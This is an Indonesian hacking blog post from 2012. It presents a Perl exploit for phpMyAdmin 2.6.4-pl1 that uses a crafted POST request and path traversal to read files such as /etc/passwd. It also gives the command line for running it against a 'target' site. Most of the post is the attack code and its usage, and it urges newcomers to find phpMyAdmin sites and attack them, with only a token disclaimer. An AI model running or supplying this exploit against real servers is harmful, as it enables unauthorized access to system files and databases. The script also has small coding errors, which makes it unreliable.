Sunday 5 February 2012

Cara membuka Database keseluruhan


 Sebelumnya ane minta maaf jika postingan ini sudah usang, jika anda sudah tahu tentang postingan ini
maka buang ke tong sampah

Bagi yang mastah jangan di baca ntar bisa membua otak anda jadi tambbah bingung
Bagi Newbie boleh kok lihat postingan ini

Langsung saja yaa kagak usah banyak bacot

Phpmyadmin biasanya tempat kita membuka akses keseluruhan databasedan tempat kita membuat, menhapus,
dan memanipulasi daa jadi phpmyadmin adalah tempat yang sangat rahasia bagi sang admin nah apa jadinya
kalo tempat yang sakral itu bisa di buka ?? wahhh bisa berabe donk

PERINGATAN ADMIN : PATCH YOUR SERVER NOW

SO apa lagi... Lets Rock and Roll sebelum kita melangkah lebih jauh
mari kita analisis dimana lubang untuk kita susupi kedalam sistem

1.Sediakan Rokok bagi yang Merokok
2.Putar Lagu yang anda sukai (Kalau ane Sih lagunya SID)
3.Direkory phpmyadmin biasanya ada di http://www.target.com/phpmyadmin/
nah apabila direktory itu tidak proeksi maka gawat donk jadi biasanya
tempat itu pasti.... di pasword
4.file vulnerable yang bisa kita intip maka berdasarkan hal di atas
(Duh kayak kuliah aja ya formal banget isinya),mari kita membuat exploit sederhana
[dokter@localhost exploit]$ cat > phpmyadmin.pl

#!/usr/bin/perl
use IO::Socket;

# dokter^cinta
# bruteforce team @dalnet
#
# exploit phpMyAdmin 2.6.4-pl1
#
#
# Greatz to all my friends
# thanks for your idea to make this exploit 
#
# Contact : dokter.cinta[at]gmail.com
# Website : http://Forum.doktercinta.org
#

if (@ARGV < 3)
{
print "\r\n Modified By: Dokter^cinta @ dalnet\r\n";
print "EXpl01T phpMyAdmin 2.6.4-pl1\r\n";
print " \r\n";
print "perl phpmyadmin.pl target /DIR/ FILE\r\n\r\n"; 
print "target - target dimana ada phpmyadmin contoh: http://localhost\r\n";
print "DIR - Direktori untuk PMA contoh: /phpMyAdmin- 2.6.4-pl1/\r\n";
print "FILE - file untuk di intip ../../../../../etc/passwd\r\n\r\n"; 
print "contoh cmd: perl phpmyadmin.pl http://localhost /phpMyAdmin-2.6.4-pl1/
../../../../../etc/passwd\r\n\r\n";
print "\r\n Bruteforce Team @dalnet\r\n";
exit(); 
}

$HOST = $ARGV[0];
$DIR = $ARGV[1]."libraries/grab_globals.lib.php";
$FILE = "usesubform[1]=1&usesubform[2]=1&subform[1][redirect]=".
$ARGV[2].
"&subform[1][cXIb8O3]=1"; 
$LENGTH = length $FILE;

print "\r\ntarget adalah: ".$HOST."\r\n\r\n";
$HOST =~ s/(http:\/\/)//;

$get1 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$HOST",
PeerPort => "80") || die "Error 404\r\n\r\n";

print $get1 "POST ".$DIR." HTTP/1.0\n";
print $get1 "Host: ".%HOST."\n";
print $get1 "Content-Type: application/x-www-form-urlencoded\n";
print $get1 "Content-Length: ".$LENGTH."\n\n"; 

print $get1 $FILE;

while ($odp = <$get1>)
{
if ($odp =~ /Warning<\/b>: main\(\): akses ditolak hikz hikz hikz .\/$ARGV[2]
in
/ ) {
printf "\n\nFile ".$ARGV[2]." tak ada om :( .\r\n\r\n";
exit; 
}

printf $odp;


Mari kita cari target yang pakai phpmyadmin

Lalu apa lagi.....?? serang!!!!1!!!!!
[dokter@localhost exploit]$ perl phpmyadmin.pl www.target.com /phpMyAdmin-2.6.4-pl1/
../../../../../etc/passwd 
target adalah : www.target.com
dan good luck
you got their database

Warning !!!!

saya tidak bertanggung jawab atas penyalah gunaan dari postingan ini
dan ini hanya sebagi ilmu pengetahuan belaka
jadi sekali lagi
Please Don't Try this at other People PCS
Try his with your own risk

Thanks for
Allah SWT
Nabi Muhammad SAW
My Parents
My girlfriend yang telah mensuport aku

Newer Post Older Post Home

1 comments:

mantab om,ijin baca ah

Post a Comment